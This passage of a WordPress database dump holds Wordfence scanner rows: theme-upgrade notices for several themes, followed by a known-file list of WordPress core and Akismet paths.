Twenty\" needs an upgrade (1.7 -> 1.8).','You need to upgrade \"Twenty Twenty\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:3:\"1.8\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/theme/twentytwenty.1.8.zip\";s:3:\"URL\";s:42:\"https://wordpress.org/themes/twentytwenty/\";s:4:\"Name\";s:13:\"Twenty Twenty\";s:4:\"name\";s:13:\"Twenty Twenty\";s:7:\"version\";s:3:\"1.7\";s:10:\"vulnerable\";b:0;}'),(1239,1629717530,1629717530,'new','wfThemeUpgrade',50,'2fe1115c1ca9c416ae1e8e7aea44d03e','2fe1115c1ca9c416ae1e8e7aea44d03e','The Theme \"Twenty Twenty-One\" needs an upgrade (1.3 -> 1.4).','You need to upgrade \"Twenty Twenty-One\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:3:\"1.4\";s:7:\"package\";s:61:\"https://downloads.wordpress.org/theme/twentytwentyone.1.4.zip\";s:3:\"URL\";s:45:\"https://wordpress.org/themes/twentytwentyone/\";s:4:\"Name\";s:17:\"Twenty Twenty-One\";s:4:\"name\";s:17:\"Twenty Twenty-One\";s:7:\"version\";s:3:\"1.3\";s:10:\"vulnerable\";b:0;}'),(1240,1629717530,1629717530,'new','wfThemeUpgrade',50,'b887a0391ee978888cd65256afab7d02','b887a0391ee978888cd65256afab7d02','The Theme \"Vision Lite\" needs an upgrade (1.1.3 -> 1.1.6).','You need to upgrade \"Vision Lite\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"1.1.6\";s:7:\"package\";s:59:\"https://downloads.wordpress.org/theme/vision-lite.1.1.6.zip\";s:3:\"URL\";s:41:\"https://wordpress.org/themes/vision-lite/\";s:4:\"Name\";s:11:\"Vision Lite\";s:4:\"name\";s:11:\"Vision Lite\";s:7:\"version\";s:5:\"1.1.3\";s:10:\"vulnerable\";b:0;}'),(1241,1629717530,1629717530,'new','wfThemeUpgrade',50,'e0fddaf7a7f70eb435060d9793c829cc','e0fddaf7a7f70eb435060d9793c829cc','The Theme \"Weblog\" needs an upgrade (1.0.1 -> 3.0.4).','You need to upgrade \"Weblog\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"3.0.4\";s:7:\"package\";s:54:\"https://downloads.wordpress.org/theme/weblog.3.0.4.zip\";s:3:\"URL\";s:36:\"https://wordpress.org/themes/weblog/\";s:4:\"Name\";s:6:\"Weblog\";s:4:\"name\";s:6:\"Weblog\";s:7:\"version\";s:5:\"1.0.1\";s:10:\"vulnerable\";b:0;}'),(1242,1629717530,1629717530,'new','wfThemeUpgrade',50,'296c028b88ba7d2257d0c43d1527b292','296c028b88ba7d2257d0c43d1527b292','The Theme \"WP Barrister\" needs an upgrade (1.0.9 -> 2.3.1).','You need to upgrade \"WP Barrister\" to the newest version to ensure you have any security fixes the developer has released.','a:7:{s:10:\"newVersion\";s:5:\"2.3.1\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/theme/wp-barrister.2.3.1.zip\";s:3:\"URL\";s:42:\"https://wordpress.org/themes/wp-barrister/\";s:4:\"Name\";s:12:\"WP Barrister\";s:4:\"name\";s:12:\"WP Barrister\";s:7:\"version\";s:5:\"1.0.9\";s:10:\"vulnerable\";b:0;}');
/*!40000 ALTER TABLE `wp_wfissues` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfknownfilelist`
--
DROP TABLE IF EXISTS `wp_wfknownfilelist`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfknownfilelist` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`path` text NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=4476 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfknownfilelist`
--
LOCK TABLES `wp_wfknownfilelist` WRITE;
/*!40000 ALTER TABLE `wp_wfknownfilelist` DISABLE KEYS */;
INSERT INTO `wp_wfknownfilelist` VALUES (1,'index.php'),(2,'license.txt'),(3,'readme.html'),(4,'wordfence-waf.php'),(5,'wp-activate.php'),(6,'wp-admin/about.php'),(7,'wp-admin/admin-ajax.php'),(8,'wp-admin/admin-footer.php'),(9,'wp-admin/admin-functions.php'),(10,'wp-admin/admin-header.php'),(11,'wp-admin/admin-post.php'),(12,'wp-admin/admin.php'),(13,'wp-admin/async-upload.php'),(14,'wp-admin/authorize-application.php'),(15,'wp-admin/comment.php'),(16,'wp-admin/credits.php'),(17,'wp-admin/css/about-rtl.css'),(18,'wp-admin/css/about-rtl.min.css'),(19,'wp-admin/css/about.css'),(20,'wp-admin/css/about.min.css'),(21,'wp-admin/css/admin-menu-rtl.css'),(22,'wp-admin/css/admin-menu-rtl.min.css'),(23,'wp-admin/css/admin-menu.css'),(24,'wp-admin/css/admin-menu.min.css'),(25,'wp-admin/css/code-editor-rtl.css'),(26,'wp-admin/css/code-editor-rtl.min.css'),(27,'wp-admin/css/code-editor.css'),(28,'wp-admin/css/code-editor.min.css'),(29,'wp-admin/css/color-picker-rtl.css'),(30,'wp-admin/css/color-picker-rtl.min.css'),(31,'wp-admin/css/color-picker.css'),(32,'wp-admin/css/color-picker.min.css'),(33,'wp-admin/css/colors/_admin.scss'),(34,'wp-admin/css/colors/_mixins.scss'),(35,'wp-admin/css/colors/_variables.scss'),(36,'wp-admin/css/colors/blue/colors-rtl.css'),(37,'wp-admin/css/colors/blue/colors-rtl.min.css'),(38,'wp-admin/css/colors/blue/colors.css'),(39,'wp-admin/css/colors/blue/colors.min.css'),(40,'wp-admin/css/colors/blue/colors.scss'),(41,'wp-admin/css/colors/coffee/colors-rtl.css'),(42,'wp-admin/css/colors/coffee/colors-rtl.min.css'),(43,'wp-admin/css/colors/coffee/colors.css'),(44,'wp-admin/css/colors/coffee/colors.min.css'),(45,'wp-admin/css/colors/coffee/colors.scss'),(46,'wp-admin/css/colors/ectoplasm/colors-rtl.css'),(47,'wp-admin/css/colors/ectoplasm/colors-rtl.min.css'),(48,'wp-admin/css/colors/ectoplasm/colors.css'),(49,'wp-admin/css/colors/ectoplasm/colors.min.css'),(50,'wp-admin/css/colors/ectoplasm/colors.scss'),(51,'wp-admin/css/colors/light/colors-rtl.css'),(52,'wp-admin/css/colors/light/colors-rtl.min.css'),(53,'wp-admin/css/colors/light/colors.css'),(54,'wp-admin/css/colors/light/colors.min.css'),(55,'wp-admin/css/colors/light/colors.scss'),(56,'wp-admin/css/colors/midnight/colors-rtl.css'),(57,'wp-admin/css/colors/midnight/colors-rtl.min.css'),(58,'wp-admin/css/colors/midnight/colors.css'),(59,'wp-admin/css/colors/midnight/colors.min.css'),(60,'wp-admin/css/colors/midnight/colors.scss'),(61,'wp-admin/css/colors/modern/colors-rtl.css'),(62,'wp-admin/css/colors/modern/colors-rtl.min.css'),(63,'wp-admin/css/colors/modern/colors.css'),(64,'wp-admin/css/colors/modern/colors.min.css'),(65,'wp-admin/css/colors/modern/colors.scss'),(66,'wp-admin/css/colors/ocean/colors-rtl.css'),(67,'wp-admin/css/colors/ocean/colors-rtl.min.css'),(68,'wp-admin/css/colors/ocean/colors.css'),(69,'wp-admin/css/colors/ocean/colors.min.css'),(70,'wp-admin/css/colors/ocean/colors.scss'),(71,'wp-admin/css/colors/sunrise/colors-rtl.css'),(72,'wp-admin/css/colors/sunrise/colors-rtl.min.css'),(73,'wp-admin/css/colors/sunrise/colors.css'),(74,'wp-admin/css/colors/sunrise/colors.min.css'),(75,'wp-admin/css/colors/sunrise/colors.scss'),(76,'wp-admin/css/common-rtl.css'),(77,'wp-admin/css/common-rtl.min.css'),(78,'wp-admin/css/common.css'),(79,'wp-admin/css/common.min.css'),(80,'wp-admin/css/customize-controls-rtl.css'),(81,'wp-admin/css/customize-controls-rtl.min.css'),(82,'wp-admin/css/customize-controls.css'),(83,'wp-admin/css/customize-controls.min.css'),(84,'wp-admin/css/customize-nav-menus-rtl.css'),(85,'wp-admin/css/customize-nav-menus-rtl.min.css'),(86,'wp-admin/css/customize-nav-menus.css'),(87,'wp-admin/css/customize-nav-menus.min.css'),(88,'wp-admin/css/customize-widgets-rtl.css'),(89,'wp-admin/css/customize-widgets-rtl.min.css'),(90,'wp-admin/css/customize-widgets.css'),(91,'wp-admin/css/customize-widgets.min.css'),(92,'wp-admin/css/dashboard-rtl.css'),(93,'wp-admin/css/dashboard-rtl.min.css'),(94,'wp-admin/css/dashboard.css'),(95,'wp-admin/css/dashboard.min.css'),(96,'wp-admin/css/deprecated-media-rtl.css'),(97,'wp-admin/css/deprecated-media-rtl.min.css'),(98,'wp-admin/css/deprecated-media.css'),(99,'wp-admin/css/deprecated-media.min.css'),(100,'wp-admin/css/edit-rtl.css'),(101,'wp-admin/css/edit-rtl.min.css'),(102,'wp-admin/css/edit.css'),(103,'wp-admin/css/edit.min.css'),(104,'wp-admin/css/farbtastic-rtl.css'),(105,'wp-admin/css/farbtastic-rtl.min.css'),(106,'wp-admin/css/farbtastic.css'),(107,'wp-admin/css/farbtastic.min.css'),(108,'wp-admin/css/forms-rtl.css'),(109,'wp-admin/css/forms-rtl.min.css'),(110,'wp-admin/css/forms.css'),(111,'wp-admin/css/forms.min.css'),(112,'wp-admin/css/install-rtl.css'),(113,'wp-admin/css/install-rtl.min.css'),(114,'wp-admin/css/install.css'),(115,'wp-admin/css/install.min.css'),(116,'wp-admin/css/l10n-rtl.css'),(117,'wp-admin/css/l10n-rtl.min.css'),(118,'wp-admin/css/l10n.css'),(119,'wp-admin/css/l10n.min.css'),(120,'wp-admin/css/list-tables-rtl.css'),(121,'wp-admin/css/list-tables-rtl.min.css'),(122,'wp-admin/css/list-tables.css'),(123,'wp-admin/css/list-tables.min.css'),(124,'wp-admin/css/login-rtl.css'),(125,'wp-admin/css/login-rtl.min.css'),(126,'wp-admin/css/login.css'),(127,'wp-admin/css/login.min.css'),(128,'wp-admin/css/media-rtl.css'),(129,'wp-admin/css/media-rtl.min.css'),(130,'wp-admin/css/media.css'),(131,'wp-admin/css/media.min.css'),(132,'wp-admin/css/nav-menus-rtl.css'),(133,'wp-admin/css/nav-menus-rtl.min.css'),(134,'wp-admin/css/nav-menus.css'),(135,'wp-admin/css/nav-menus.min.css'),(136,'wp-admin/css/revisions-rtl.css'),(137,'wp-admin/css/revisions-rtl.min.css'),(138,'wp-admin/css/revisions.css'),(139,'wp-admin/css/revisions.min.css'),(140,'wp-admin/css/site-health-rtl.css'),(141,'wp-admin/css/site-health-rtl.min.css'),(142,'wp-admin/css/site-health.css'),(143,'wp-admin/css/site-health.min.css'),(144,'wp-admin/css/site-icon-rtl.css'),(145,'wp-admin/css/site-icon-rtl.min.css'),(146,'wp-admin/css/site-icon.css'),(147,'wp-admin/css/site-icon.min.css'),(148,'wp-admin/css/themes-rtl.css'),(149,'wp-admin/css/themes-rtl.min.css'),(150,'wp-admin/css/themes.css'),(151,'wp-admin/css/themes.min.css'),(152,'wp-admin/css/widgets-rtl.css'),(153,'wp-admin/css/widgets-rtl.min.css'),(154,'wp-admin/css/widgets.css'),(155,'wp-admin/css/widgets.min.css'),(156,'wp-admin/css/wp-admin-rtl.css'),(157,'wp-admin/css/wp-admin-rtl.min.css'),(158,'wp-admin/css/wp-admin.css'),(159,'wp-admin/css/wp-admin.min.css'),(160,'wp-admin/custom-background.php'),(161,'wp-admin/custom-header.php'),(162,'wp-admin/customize.php'),(163,'wp-admin/edit-comments.php'),(164,'wp-admin/edit-form-advanced.php'),(165,'wp-admin/edit-form-blocks.php'),(166,'wp-admin/edit-form-comment.php'),(167,'wp-admin/edit-link-form.php'),(168,'wp-admin/edit-tag-form.php'),(169,'wp-admin/edit-tags.php'),(170,'wp-admin/edit.php'),(171,'wp-admin/erase-personal-data.php'),(172,'wp-admin/export-personal-data.php'),(173,'wp-admin/export.php'),(174,'wp-admin/freedoms.php'),(175,'wp-admin/images/about-badge.svg'),(176,'wp-admin/images/about-color-palette-vert.svg'),(177,'wp-admin/images/about-color-palette.svg'),(178,'wp-admin/images/about-header-brushes.svg'),(179,'wp-admin/images/align-center-2x.png'),(180,'wp-admin/images/align-center.png'),(181,'wp-admin/images/align-left-2x.png'),(182,'wp-admin/images/align-left.png'),(183,'wp-admin/images/align-none-2x.png'),(184,'wp-admin/images/align-none.png'),(185,'wp-admin/images/align-right-2x.png'),(186,'wp-admin/images/align-right.png'),(187,'wp-admin/images/arrows-2x.png'),(188,'wp-admin/images/arrows.png'),(189,'wp-admin/images/browser-rtl.png'),(190,'wp-admin/images/browser.png'),(191,'wp-admin/images/bubble_bg-2x.gif'),(192,'wp-admin/images/bubble_bg.gif'),(193,'wp-admin/images/comment-grey-bubble-2x.png'),(194,'wp-admin/images/comment-grey-bubble.png'),(195,'wp-admin/images/date-button-2x.gif'),(196,'wp-admin/images/date-button.gif'),(197,'wp-admin/images/freedoms.png'),(198,'wp-admin/images/generic.png'),(199,'wp-admin/images/icons32-2x.png'),(200,'wp-admin/images/icons32-vs-2x.png'),(201,'wp-admin/images/icons32-vs.png'),(202,'wp-admin/images/icons32.png'),(203,'wp-admin/images/imgedit-icons-2x.png'),(204,'wp-admin/images/imgedit-icons.png'),(205,'wp-admin/images/list-2x.png'),(206,'wp-admin/images/list.png'),(207,'wp-admin/images/loading.gif'),(208,'wp-admin/images/marker.png'),(209,'wp-admin/images/mask.png'),(210,'wp-admin/images/media-button-2x.png'),(211,'wp-admin/images/media-button-image.gif'),(212,'wp-admin/images/media-button-music.gif'),(213,'wp-admin/images/media-button-other.gif'),(214,'wp-admin/images/media-button-video.gif'),(215,'wp-admin/images/media-button.png'),(216,'wp-admin/images/menu-2x.png'),(217,'wp-admin/images/menu-vs-2x.png'),(218,'wp-admin/images/menu-vs.png'),(219,'wp-admin/images/menu.png'),(220,'wp-admin/images/no.png'),(221,'wp-admin/images/post-formats-vs.png'),(222,'wp-admin/images/post-formats.png'),(223,'wp-admin/images/post-formats32-vs.png'),(224,'wp-admin/images/post-formats32.png'),(225,'wp-admin/images/privacy.png'),(226,'wp-admin/images/resize-2x.gif'),(227,'wp-admin/images/resize-rtl-2x.gif'),(228,'wp-admin/images/resize-rtl.gif'),(229,'wp-admin/images/resize.gif'),(230,'wp-admin/images/se.png'),(231,'wp-admin/images/sort-2x.gif'),(232,'wp-admin/images/sort.gif'),(233,'wp-admin/images/spinner-2x.gif'),(234,'wp-admin/images/spinner.gif'),(235,'wp-admin/images/stars-2x.png'),(236,'wp-admin/images/stars.png'),(237,'wp-admin/images/w-logo-blue.png'),(238,'wp-admin/images/w-logo-white.png'),(239,'wp-admin/images/wheel.png'),(240,'wp-admin/images/wordpress-logo-white.svg'),(241,'wp-admin/images/wordpress-logo.png'),(242,'wp-admin/images/wordpress-logo.svg'),(243,'wp-admin/images/wpspin_light-2x.gif'),(244,'wp-admin/images/wpspin_light.gif'),(245,'wp-admin/images/xit-2x.gif'),(246,'wp-admin/images/xit.gif'),(247,'wp-admin/images/yes.png'),(248,'wp-admin/import.php'),(249,'wp-admin/includes/admin-filters.php'),(250,'wp-admin/includes/admin.php'),(251,'wp-admin/includes/ajax-actions.php'),(252,'wp-admin/includes/bookmark.php'),(253,'wp-admin/includes/class-automatic-upgrader-skin.php'),(254,'wp-admin/includes/class-bulk-plugin-upgrader-skin.php'),(255,'wp-admin/includes/class-bulk-theme-upgrader-skin.php'),(256,'wp-admin/includes/class-bulk-upgrader-skin.php'),(257,'wp-admin/includes/class-core-upgrader.php'),(258,'wp-admin/includes/class-custom-background.php'),(259,'wp-admin/includes/class-custom-image-header.php'),(260,'wp-admin/includes/class-file-upload-upgrader.php'),(261,'wp-admin/includes/class-ftp-pure.php'),(262,'wp-admin/includes/class-ftp-sockets.php'),(263,'wp-admin/includes/class-ftp.php'),(264,'wp-admin/includes/class-language-pack-upgrader-skin.php'),(265,'wp-admin/includes/class-language-pack-upgrader.php'),(266,'wp-admin/includes/class-pclzip.php'),(267,'wp-admin/includes/class-plugin-installer-skin.php'),(268,'wp-admin/includes/class-plugin-upgrader-skin.php'),(269,'wp-admin/includes/class-plugin-upgrader.php'),(270,'wp-admin/includes/class-theme-installer-skin.php'),(271,'wp-admin/includes/class-theme-upgrader-skin.php'),(272,'wp-admin/includes/class-theme-upgrader.php'),(273,'wp-admin/includes/class-walker-category-checklist.php'),(274,'wp-admin/includes/class-walker-nav-menu-checklist.php'),(275,'wp-admin/includes/class-walker-nav-menu-edit.php'),(276,'wp-admin/includes/class-wp-ajax-upgrader-skin.php'),(277,'wp-admin/includes/class-wp-application-passwords-list-table.php'),(278,'wp-admin/includes/class-wp-automatic-updater.php'),(279,'wp-admin/includes/class-wp-comments-list-table.php'),(280,'wp-admin/includes/class-wp-community-events.php'),(281,'wp-admin/includes/class-wp-debug-data.php'),(282,'wp-admin/includes/class-wp-filesystem-base.php'),(283,'wp-admin/includes/class-wp-filesystem-direct.php'),(284,'wp-admin/includes/class-wp-filesystem-ftpext.php'),(285,'wp-admin/includes/class-wp-filesystem-ftpsockets.php'),(286,'wp-admin/includes/class-wp-filesystem-ssh2.php'),(287,'wp-admin/includes/class-wp-importer.php'),(288,'wp-admin/includes/class-wp-internal-pointers.php'),(289,'wp-admin/includes/class-wp-links-list-table.php'),(290,'wp-admin/includes/class-wp-list-table-compat.php'),(291,'wp-admin/includes/class-wp-list-table.php'),(292,'wp-admin/includes/class-wp-media-list-table.php'),(293,'wp-admin/includes/class-wp-ms-sites-list-table.php'),(294,'wp-admin/includes/class-wp-ms-themes-list-table.php'),(295,'wp-admin/includes/class-wp-ms-users-list-table.php'),(296,'wp-admin/includes/class-wp-plugin-install-list-table.php'),(297,'wp-admin/includes/class-wp-plugins-list-table.php'),(298,'wp-admin/includes/class-wp-post-comments-list-table.php'),(299,'wp-admin/includes/class-wp-posts-list-table.php'),(300,'wp-admin/includes/class-wp-privacy-data-export-requests-list-table.php'),(301,'wp-admin/includes/class-wp-privacy-data-removal-requests-list-table.php'),(302,'wp-admin/includes/class-wp-privacy-policy-content.php'),(303,'wp-admin/includes/class-wp-privacy-requests-table.php'),(304,'wp-admin/includes/class-wp-screen.php'),(305,'wp-admin/includes/class-wp-site-health-auto-updates.php'),(306,'wp-admin/includes/class-wp-site-health.php'),(307,'wp-admin/includes/class-wp-site-icon.php'),(308,'wp-admin/includes/class-wp-terms-list-table.php'),(309,'wp-admin/includes/class-wp-theme-install-list-table.php'),(310,'wp-admin/includes/class-wp-themes-list-table.php'),(311,'wp-admin/includes/class-wp-upgrader-skin.php'),(312,'wp-admin/includes/class-wp-upgrader-skins.php'),(313,'wp-admin/includes/class-wp-upgrader.php'),(314,'wp-admin/includes/class-wp-users-list-table.php'),(315,'wp-admin/includes/comment.php'),(316,'wp-admin/includes/continents-cities.php'),(317,'wp-admin/includes/credits.php'),(318,'wp-admin/includes/dashboard.php'),(319,'wp-admin/includes/deprecated.php'),(320,'wp-admin/includes/edit-tag-messages.php'),(321,'wp-admin/includes/export.php'),(322,'wp-admin/includes/file.php'),(323,'wp-admin/includes/image-edit.php'),(324,'wp-admin/includes/image.php'),(325,'wp-admin/includes/import.php'),(326,'wp-admin/includes/list-table.php'),(327,'wp-admin/includes/media.php'),(328,'wp-admin/includes/menu.php'),(329,'wp-admin/includes/meta-boxes.php'),(330,'wp-admin/includes/misc.php'),(331,'wp-admin/includes/ms-admin-filters.php'),(332,'wp-admin/includes/ms-deprecated.php'),(333,'wp-admin/includes/ms.php'),(334,'wp-admin/includes/nav-menu.php'),(335,'wp-admin/includes/network.php'),(336,'wp-admin/includes/noop.php'),(337,'wp-admin/includes/options.php'),(338,'wp-admin/includes/plugin-install.php'),(339,'wp-admin/includes/plugin.php'),(340,'wp-admin/includes/post.php'),(341,'wp-admin/includes/privacy-tools.php'),(342,'wp-admin/includes/revision.php'),(343,'wp-admin/includes/schema.php'),(344,'wp-admin/includes/screen.php'),(345,'wp-admin/includes/taxonomy.php'),(346,'wp-admin/includes/template.php'),(347,'wp-admin/includes/theme-install.php'),(348,'wp-admin/includes/theme.php'),(349,'wp-admin/includes/translation-install.php'),(350,'wp-admin/includes/update-core.php'),(351,'wp-admin/includes/update.php'),(352,'wp-admin/includes/upgrade.php'),(353,'wp-admin/includes/user.php'),(354,'wp-admin/includes/widgets.php'),(355,'wp-admin/index.php'),(356,'wp-admin/install-helper.php'),(357,'wp-admin/install.php'),(358,'wp-admin/js/accordion.js'),(359,'wp-admin/js/accordion.min.js'),(360,'wp-admin/js/application-passwords.js'),(361,'wp-admin/js/application-passwords.min.js'),(362,'wp-admin/js/auth-app.js'),(363,'wp-admin/js/auth-app.min.js'),(364,'wp-admin/js/code-editor.js'),(365,'wp-admin/js/code-editor.min.js'),(366,'wp-admin/js/color-picker.js'),(367,'wp-admin/js/color-picker.min.js'),(368,'wp-admin/js/comment.js'),(369,'wp-admin/js/comment.min.js'),(370,'wp-admin/js/common.js'),(371,'wp-admin/js/common.min.js'),(372,'wp-admin/js/custom-background.js'),(373,'wp-admin/js/custom-background.min.js'),(374,'wp-admin/js/custom-header.js'),(375,'wp-admin/js/customize-controls.js'),(376,'wp-admin/js/customize-controls.min.js'),(377,'wp-admin/js/customize-nav-menus.js'),(378,'wp-admin/js/customize-nav-menus.min.js'),(379,'wp-admin/js/customize-widgets.js'),(380,'wp-admin/js/customize-widgets.min.js'),(381,'wp-admin/js/dashboard.js'),(382,'wp-admin/js/dashboard.min.js'),(383,'wp-admin/js/edit-comments.js'),(384,'wp-admin/js/edit-comments.min.js'),(385,'wp-admin/js/editor-expand.js'),(386,'wp-admin/js/editor-expand.min.js'),(387,'wp-admin/js/editor.js'),(388,'wp-admin/js/editor.min.js'),(389,'wp-admin/js/farbtastic.js'),(390,'wp-admin/js/gallery.js'),(391,'wp-admin/js/gallery.min.js'),(392,'wp-admin/js/image-edit.js'),(393,'wp-admin/js/image-edit.min.js'),(394,'wp-admin/js/index.php'),(395,'wp-admin/js/inline-edit-post.js'),(396,'wp-admin/js/inline-edit-post.min.js'),(397,'wp-admin/js/inline-edit-tax.js'),(398,'wp-admin/js/inline-edit-tax.min.js'),(399,'wp-admin/js/iris.min.js'),(400,'wp-admin/js/language-chooser.js'),(401,'wp-admin/js/language-chooser.min.js'),(402,'wp-admin/js/link.js'),(403,'wp-admin/js/link.min.js'),(404,'wp-admin/js/media-gallery.js'),(405,'wp-admin/js/media-gallery.min.js'),(406,'wp-admin/js/media-upload.js'),(407,'wp-admin/js/media-upload.min.js'),(408,'wp-admin/js/media.js'),(409,'wp-admin/js/media.min.js'),(410,'wp-admin/js/nav-menu.js'),(411,'wp-admin/js/nav-menu.min.js'),(412,'wp-admin/js/password-strength-meter.js'),(413,'wp-admin/js/password-strength-meter.min.js'),(414,'wp-admin/js/plugin-install.js'),(415,'wp-admin/js/plugin-install.min.js'),(416,'wp-admin/js/post.js'),(417,'wp-admin/js/post.min.js'),(418,'wp-admin/js/postbox.js'),(419,'wp-admin/js/postbox.min.js'),(420,'wp-admin/js/privacy-tools.js'),(421,'wp-admin/js/privacy-tools.min.js'),(422,'wp-admin/js/revisions.js'),(423,'wp-admin/js/revisions.min.js'),(424,'wp-admin/js/set-post-thumbnail.js'),(425,'wp-admin/js/set-post-thumbnail.min.js'),(426,'wp-admin/js/site-health.js'),(427,'wp-admin/js/site-health.min.js'),(428,'wp-admin/js/svg-painter.js'),(429,'wp-admin/js/svg-painter.min.js'),(430,'wp-admin/js/tags-box.js'),(431,'wp-admin/js/tags-box.min.js'),(432,'wp-admin/js/tags-suggest.js'),(433,'wp-admin/js/tags-suggest.min.js'),(434,'wp-admin/js/tags.js'),(435,'wp-admin/js/tags.min.js'),(436,'wp-admin/js/theme-plugin-editor.js'),(437,'wp-admin/js/theme-plugin-editor.min.js'),(438,'wp-admin/js/theme.js'),(439,'wp-admin/js/theme.min.js'),(440,'wp-admin/js/updates.js'),(441,'wp-admin/js/updates.min.js'),(442,'wp-admin/js/user-profile.js'),(443,'wp-admin/js/user-profile.min.js'),(444,'wp-admin/js/user-suggest.js'),(445,'wp-admin/js/user-suggest.min.js'),(446,'wp-admin/js/widgets/custom-html-widgets.js'),(447,'wp-admin/js/widgets/custom-html-widgets.min.js'),(448,'wp-admin/js/widgets/media-audio-widget.js'),(449,'wp-admin/js/widgets/media-audio-widget.min.js'),(450,'wp-admin/js/widgets/media-gallery-widget.js'),(451,'wp-admin/js/widgets/media-gallery-widget.min.js'),(452,'wp-admin/js/widgets/media-image-widget.js'),(453,'wp-admin/js/widgets/media-image-widget.min.js'),(454,'wp-admin/js/widgets/media-video-widget.js'),(455,'wp-admin/js/widgets/media-video-widget.min.js'),(456,'wp-admin/js/widgets/media-widgets.js'),(457,'wp-admin/js/widgets/media-widgets.min.js'),(458,'wp-admin/js/widgets/text-widgets.js'),(459,'wp-admin/js/widgets/text-widgets.min.js'),(460,'wp-admin/js/widgets.js'),(461,'wp-admin/js/widgets.min.js'),(462,'wp-admin/js/word-count.js'),(463,'wp-admin/js/word-count.min.js'),(464,'wp-admin/js/xfn.js'),(465,'wp-admin/js/xfn.min.js'),(466,'wp-admin/link-add.php'),(467,'wp-admin/link-manager.php'),(468,'wp-admin/link-parse-opml.php'),(469,'wp-admin/link.php'),(470,'wp-admin/load-scripts.php'),(471,'wp-admin/load-styles.php'),(472,'wp-admin/maint/repair.php'),(473,'wp-admin/media-new.php'),(474,'wp-admin/media-upload.php'),(475,'wp-admin/media.php'),(476,'wp-admin/menu-header.php'),(477,'wp-admin/menu.php'),(478,'wp-admin/moderation.php'),(479,'wp-admin/ms-admin.php'),(480,'wp-admin/ms-delete-site.php'),(481,'wp-admin/ms-edit.php'),(482,'wp-admin/ms-options.php'),(483,'wp-admin/ms-sites.php'),(484,'wp-admin/ms-themes.php'),(485,'wp-admin/ms-upgrade-network.php'),(486,'wp-admin/ms-users.php'),(487,'wp-admin/my-sites.php'),(488,'wp-admin/nav-menus.php'),(489,'wp-admin/network/about.php'),(490,'wp-admin/network/admin.php'),(491,'wp-admin/network/credits.php'),(492,'wp-admin/network/edit.php'),(493,'wp-admin/network/freedoms.php'),(494,'wp-admin/network/index.php'),(495,'wp-admin/network/menu.php'),(496,'wp-admin/network/plugin-editor.php'),(497,'wp-admin/network/plugin-install.php'),(498,'wp-admin/network/plugins.php'),(499,'wp-admin/network/privacy.php'),(500,'wp-admin/network/profile.php'),(501,'wp-admin/network/settings.php'),(502,'wp-admin/network/setup.php'),(503,'wp-admin/network/site-info.php'),(504,'wp-admin/network/site-new.php'),(505,'wp-admin/network/site-settings.php'),(506,'wp-admin/network/site-themes.php'),(507,'wp-admin/network/site-users.php'),(508,'wp-admin/network/sites.php'),(509,'wp-admin/network/theme-editor.php'),(510,'wp-admin/network/theme-install.php'),(511,'wp-admin/network/themes.php'),(512,'wp-admin/network/update-core.php'),(513,'wp-admin/network/update.php'),(514,'wp-admin/network/upgrade.php'),(515,'wp-admin/network/user-edit.php'),(516,'wp-admin/network/user-new.php'),(517,'wp-admin/network/users.php'),(518,'wp-admin/network.php'),(519,'wp-admin/options-discussion.php'),(520,'wp-admin/options-general.php'),(521,'wp-admin/options-head.php'),(522,'wp-admin/options-media.php'),(523,'wp-admin/options-permalink.php'),(524,'wp-admin/options-privacy.php'),(525,'wp-admin/options-reading.php'),(526,'wp-admin/options-writing.php'),(527,'wp-admin/options.php'),(528,'wp-admin/plugin-editor.php'),(529,'wp-admin/plugin-install.php'),(530,'wp-admin/plugins.php'),(531,'wp-admin/post-new.php'),(532,'wp-admin/post.php'),(533,'wp-admin/press-this.php'),(534,'wp-admin/privacy-policy-guide.php'),(535,'wp-admin/privacy.php'),(536,'wp-admin/profile.php'),(537,'wp-admin/revision.php'),(538,'wp-admin/setup-config.php'),(539,'wp-admin/site-health-info.php'),(540,'wp-admin/site-health.php'),(541,'wp-admin/term.php'),(542,'wp-admin/theme-editor.php'),(543,'wp-admin/theme-install.php'),(544,'wp-admin/themes.php'),(545,'wp-admin/tools.php'),(546,'wp-admin/update-core.php'),(547,'wp-admin/update.php'),(548,'wp-admin/upgrade-functions.php'),(549,'wp-admin/upgrade.php'),(550,'wp-admin/upload.php'),(551,'wp-admin/user/about.php'),(552,'wp-admin/user/admin.php'),(553,'wp-admin/user/credits.php'),(554,'wp-admin/user/freedoms.php'),(555,'wp-admin/user/index.php'),(556,'wp-admin/user/menu.php'),(557,'wp-admin/user/privacy.php'),(558,'wp-admin/user/profile.php'),(559,'wp-admin/user/user-edit.php'),(560,'wp-admin/user-edit.php'),(561,'wp-admin/user-new.php'),(562,'wp-admin/users.php'),(563,'wp-admin/widgets.php'),(564,'wp-blog-header.php'),(565,'wp-comments-post.php'),(566,'wp-config-sample.php'),(567,'wp-config.php'),(568,'wp-content/index.php'),(569,'wp-content/plugins/akismet/.htaccess'),(570,'wp-content/plugins/akismet/LICENSE.txt'),(571,'wp-content/plugins/akismet/_inc/akismet.css'),(572,'wp-content/plugins/akismet/_inc/akismet.js'),(573,'wp-content/plugins/akismet/_inc/form.js'),(574,'wp-content/plugins/akismet/_inc/img/logo-full-2x.png'),(575,'wp-content/plugins/akismet/akismet.php'),(576,'wp-content/plugins/akismet/changelog.txt'),(577,'wp-content/plugins/akismet/class.akismet-admin.php'),(578,'wp-content/plugins/akismet/class.akismet-cli.php'),(579,'wp-content/plugins/akismet/class.akismet-rest-api.php'),(580,'wp-content/plugins/akismet/class.akismet-widget.php'),(581,'wp-content/plugins/akismet/class.akismet.php'),(582,'wp-content/plugins/akismet/index.php'),(583,'wp-content/plugins/akismet/readme.txt'),(584,'wp-content/p